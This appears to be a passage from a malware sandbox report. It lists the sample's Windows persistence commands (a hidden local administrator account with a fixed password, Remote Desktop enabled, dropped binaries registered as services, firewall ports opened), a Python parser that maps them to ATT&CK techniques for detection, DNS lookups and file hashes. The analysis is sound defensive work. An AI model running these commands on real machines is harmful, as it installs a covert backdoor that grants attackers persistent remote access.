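The command lines above form one procedure: drop three binaries under Network Shortcuts, add a local account "Microsoft" and put it in Administrators (using both the English group name and the Russian "Администраторы", so it works on localized hosts), hide the account from the logon screen, switch on Remote Desktop, register the dropped files as auto-start services, and open the host firewall for them and for ports 3389, 31337, 80 and 8080. The Python below is an added example, not part of the report: it parses command lines of these shapes and maps each to the ATT&CK technique it evidences. It also flags two details that matter when writing detections from this page: the service name "ProtocolWindows_ " is padded with a trailing space, which defeats exact-name matching, and two REG ADD calls pass /t REG_REGDWORD, a type reg.exe does not accept, so the RDP PortNumber and Internet Explorer lockdown writes most likely failed in the sandbox. The technique mapping and the list of system directories are the example's own assumptions.

```python
import re

# Types reg.exe accepts for /t; anything else makes the command fail.
VALID_REG_TYPES = {"REG_SZ", "REG_MULTI_SZ", "REG_EXPAND_SZ", "REG_DWORD",
                   "REG_QWORD", "REG_BINARY", "REG_NONE"}
# Assumption: a service binary outside these prefixes is worth a finding.
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")

# Constructed sample: command lines copied from the Processes section above.
SAMPLE_CMDS = [
    r'net user Microsoft skj2g43 /add /EXPIRES:NEVER /active:yes',
    r'net localgroup Administrators Microsoft /add',
    r'net accounts /maxpwage:unlimited',
    r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Microsoft /t REG_DWORD /d 0 /f',
    r'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_REGDWORD /d 3389 /f',
    r'sc create "ProtocolWindows_ " binpath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe" displayname= "Protocol HTTP/SSL " type= own start= auto error= ignore',
    r'netsh firewall add portopening protocol = TCP port = 31337 name = TCP',
    r'netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe" ENABLE',
]


def _unq(m):
    """Value of a quoted-or-bare argument match: group 1 if quoted, else group 2."""
    return m.group(1) if m.group(1) is not None else m.group(2)


def parse_sc_create(cmd):
    """sc create <name> key= value ...; sc puts the space after '=', and the
    name is kept verbatim so trailing whitespace survives."""
    m = re.match(r'\s*sc\s+create\s+(?:"([^"]*)"|(\S+))', cmd, re.I)
    if not m:
        return None
    svc = {"name": _unq(m)}
    for opt in re.finditer(r'(\w+)=\s*(?:"([^"]*)"|(\S+))', cmd[m.end():]):
        svc[opt.group(1).lower()] = opt.group(2) if opt.group(2) is not None else opt.group(3)
    return svc


def parse_reg_add(cmd):
    """reg add <key> /v <name> /t <type> /d <data>; also records whether /t is valid."""
    m = re.match(r'\s*reg\s+add\s+(?:"([^"]*)"|(\S+))(.*)$', cmd, re.I)
    if not m:
        return None
    entry = {"key": _unq(m), "value": None, "type": None, "data": None}
    rest = m.group(3)
    for flag, field in (("v", "value"), ("t", "type"), ("d", "data")):
        fm = re.search(r'/%s\s+(?:"([^"]*)"|(\S+))' % flag, rest, re.I)
        if fm:
            entry[field] = _unq(fm)
    entry["type_ok"] = entry["type"] is None or entry["type"].upper() in VALID_REG_TYPES
    return entry


def classify(cmd):
    """Map one command line to (technique id, description) findings."""
    findings = []
    low = cmd.lower()
    if re.match(r'\s*net1?\s+user\s+\S+\s+\S+\s+/add', low):
        findings.append(("T1136.001", "local account created"))
    if re.match(r'\s*net1?\s+localgroup\s+\S+\s+\S+\s+/add', low):
        findings.append(("T1098", "account added to a local group"))
    if re.match(r'\s*net1?\s+accounts\s+/maxpwage', low):
        findings.append(("T1201", "password policy changed: expiry disabled"))
    reg = parse_reg_add(cmd)
    if reg:
        key = reg["key"].lower()
        if key.endswith("specialaccounts\\userlist") and reg["data"] == "0":
            findings.append(("T1564.002", f"account {reg['value']} hidden from the logon UI"))
        if reg["value"] and reg["value"].lower() == "fdenytsconnections" and reg["data"] == "0":
            findings.append(("T1021.001", "Remote Desktop enabled"))
        if not reg["type_ok"]:
            findings.append(("note", f"invalid /t {reg['type']}: reg.exe rejects it, write likely failed"))
    svc = parse_sc_create(cmd)
    if svc:
        findings.append(("T1543.003", f"service {svc['name']!r} created"))
        binpath = svc.get("binpath", "").lower()
        if binpath and not binpath.startswith(SYSTEM_DIRS):
            findings.append(("note", "service binary outside system directories"))
        if svc["name"] != svc["name"].strip():
            findings.append(("note", "service name padded with whitespace (defeats exact-name matching)"))
    if re.match(r'\s*netsh\s+firewall\s+add\s+(portopening|allowedprogram)', low):
        findings.append(("T1562.004", "host firewall opened"))
    return findings


def report(cmds):
    return {c: classify(c) for c in cmds}


FINDINGS = report(SAMPLE_CMDS)

if __name__ == "__main__":
    for cmd, hits in FINDINGS.items():
        print(cmd[:70], "->", hits)
```

When turning these into rules, match the service name and binary path with a trimmed or wildcard comparison rather than an exact string, and treat the fDenyTSConnections and SpecialAccounts\UserList writes as the high-confidence signals: the failed REG_REGDWORD commands still show intent but left no registry change behind.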

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

memory/1448-0-0x0000000000400000-0x0000000000548000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe

MD5 c104fc64f8ed6950ce08a5d653e9e4d7
SHA1 e1186adecb3c647cbec0705df4a8aa80281790c9
SHA256 8ded98254676bb6a64435119df030d84e8186b75051b8a1e7928aa52c8bb3937
SHA512 2b6a7f44b34af744108769658391ff46e885f09f974c32f9a5b0b559bf9e93b1185acb8fe6841c74848e4e06ff9ee31aaca6a648d43f39ae16dcaa96d576335c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe

MD5 6e0966f100cb1f523179c0adba52d45a
SHA1 d3d27da135e1388bc6619bc3f81a3324d2e9d645
SHA256 71059380b8346728a26de74e7a721e63bd9f18e81f1eec76adeabd998fb13e3b
SHA512 3dbebfd08ab3df57fefe193cd98f6ab8aeeff3406d70cc56604d8d0144de2c2b18a56f99281c93d21849badd0d76cbb943d09ce6573271af94fefb4323fbeefd

memory/1448-21-0x0000000000400000-0x0000000000548000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe

MD5 5ccc02fe24848a903a6978366c51a7d1
SHA1 056be620e7bfec514d9a377820c0b716052a305f
SHA256 4beea8eb43740d7157fe4dd34126b07864ba0d44563008cb32a21b84e4452064
SHA512 c36c7d6b15c7a3277efe2f4f56a8f7147646c4a060d06ee8c465473f61b1cc513c41cbdd3ee2a2c26c3c499dd6b960c31a742fa7dda1467fd25cabe8aefc7f71

memory/1448-24-0x0000000000400000-0x0000000000548000-memory.dmp